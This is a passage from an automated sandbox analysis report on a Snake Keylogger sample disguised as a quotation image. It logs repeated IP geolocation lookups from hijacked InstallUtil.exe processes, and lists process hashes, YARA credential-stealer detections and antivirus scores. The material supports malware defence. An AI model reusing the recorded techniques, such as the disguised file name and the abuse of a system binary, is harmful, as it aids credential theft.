                        2024-09-26 07:58:24 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.5 | 49741 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:25 UTC | 677 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2337
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EH4QxTV6z6RcTC30%2FarxYQgGjG7ApQrVZM0ezLqEDtua55jCLnpWVX1nRjND6BGEYU2b6g1mAs9%2FYOl5Dw2NGQ4vUkhMVH%2FDcWuuyiu2jb9fOUOnZhekNd2m5c7hKJRN%2Fxpdacd"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b56fbb2e4340-EWR
                        2024-09-26 07:58:25 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.5 | 49742 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:25 UTC | 681 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2337
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74iB8wmWIvhtdfoiR7QX%2B3n%2FW2MqIuYKA4XYCKKsxz9YteCUfVfO3%2BO85gLnYf5w5CbLXwZBQl4BEq6v4IaxtNAM4AB2jd%2FhHyD0VAzLKisA19OBEzEuIU9n%2Bq6uQeW8%2FsYokFJu"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b570ee3843b1-EWR
                        2024-09-26 07:58:25 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.5 | 49744 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:26 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:26 UTC | 677 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:26 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2338
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTbRFctE8SDanTc4liwLJqh0SeVGj7eiKsQf7BlT1u4lgI7I0PK6rsta0jom%2B3Dt1xtcX5W%2Br6g0sXsYRpxTnejOb%2Bn2cbojlPN%2BS8fhRUgqlZpPpwp1QSshoG4pY8DaF6yV4dQI"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b575ab21c345-EWR
                        2024-09-26 07:58:26 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.5 | 49745 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:26 UTC | 671 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:26 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2338
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0F1q1V0lW00NBxFIDIdEk4eAYEAhAGhHMPSzKNdzTOvjhAAFIYt63RuoHRG0cGrrdXkcvTYS23nyIYajs96F0PR4TPuJ%2BYEZqOKNuwL3BnryXR0gCz2naOu7iQC6XhhbiLSKqQwU"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5779c650cb5-EWR
                        2024-09-26 07:58:26 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.5 | 49748 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:27 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:27 UTC | 673 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2339
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tn9VERR8bcP2GNYzsO6ENg9nZMRjK7gLCCrslA2bnlGdNwfcAQ1SVSYEg4gnwRedc4UA%2FUhpjLxFLdqTQ0dhHLtVm5uqwUE8onT8Dkbiksmi8AnyeCiCYfOeN40aLkracPH%2BaVE"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b57f1fe07c8a-EWR
                        2024-09-26 07:58:27 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.5 | 49749 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:27 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:27 UTC | 673 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2339
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOP49QQZhHX3VF8tXW6AgyB13Dh9UWBPXitP8eF49ern2XW64%2F%2FS4fKIgAHjADIULq4rV1EJU9g7JM1KOlXJzkdrbP4FoTOFk0vhTuvm6eUivfrx8VT8qiolTYf6gT60ABzC9ETL"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b57f6ad74307-EWR
                        2024-09-26 07:58:27 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.5 | 49751 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:30 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:30 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2342
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nq%2F%2FQulPnP934F00oV3FFVJpaLw4naYZZl2fTGkZgD27YnPzUBI9S7oG1%2BgMG37aiTmuNY7sMqV8WZnsfsRNb0taeH9XB8vYuRyJUb5nbqI9IbUCDLO0IfhUFRDXyrcueza00UoB"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b590680ec328-EWR
                        2024-09-26 07:58:30 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.5 | 49753 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:33 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:33 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:33 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2345
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJtmcTHvUm4kJilAVv0CZOiNrR1kvBkeM3BRL2sNjLmpHB8F%2FpC%2FgfgFD8wgcuClqSAp2bRVflsX3kuEH98nlmLtxs49CxRk7ogGsQ3od5DtzguGZShmkmAJABh%2BVWdP4MJoKUV1"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5a17c0f425f-EWR
                        2024-09-26 07:58:33 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.5 | 49755 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:36 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:36 UTC | 705 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:36 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2348
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5sjFjbadcEn0j9G2%2Bu0GEIyiRR6rX64ThaL82qh3mHJXsH5hmIDhhM%2B9uHHJnEHKchTpzOaA2y7YBEXQiP1hFiwNuoBGcEC9ugbHfF6X5XX%2BbAqtYiYZMk5clh6etVxB2BmBeW57"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5b3fe611891-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-09-26 07:58:36 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.5 | 49757 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:38 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:38 UTC | 677 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:38 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2350
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyhNe8%2BABZdkgq2xezl1Qi3OpTsEYWPoHLZcKMYfxd%2BfyadHw5Tsp4nlh7kcVkI9jTVhtJyxbvHzGPg8VUmVjsLI2jefEC1bqJ68OIQ%2BIWg59b%2FagQKQmdZG8oDMCli3AxgOSBxq"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5c52c0b4374-EWR
                        2024-09-26 07:58:38 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.5 | 49759 | 188.114.96.3 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:41 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:41 UTC | 681 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:41 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2353
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lojlq%2BhT%2FOyPzzuFkDeVAoCR1HDtu6bIgCV44hmiB0Wsh%2BFolCFKWWwIXgwSydI1wG%2BbPW7N%2BJjbkupzS2qoLv2y67P%2BtjBHRUglLhMrwf7f07Q00hbFa0RKzGmvCYRqJRrMlrt4"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5d71de74299-EWR
                        2024-09-26 07:58:41 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Target ID:0
                        Start time:03:57:57
                        Start date:26/09/2024
                        Path:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe"
                        Imagebase:0xc70000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:03:58:00
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0xb10000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4524686788.0000000003043000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Target ID:3
                        Start time:03:58:10
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                        Imagebase:0x210000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2248365081.0000000003C8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 63%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:03:58:14
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0x9b0000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4524242471.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Target ID:6
                        Start time:03:58:18
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                        Imagebase:0x3c0000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
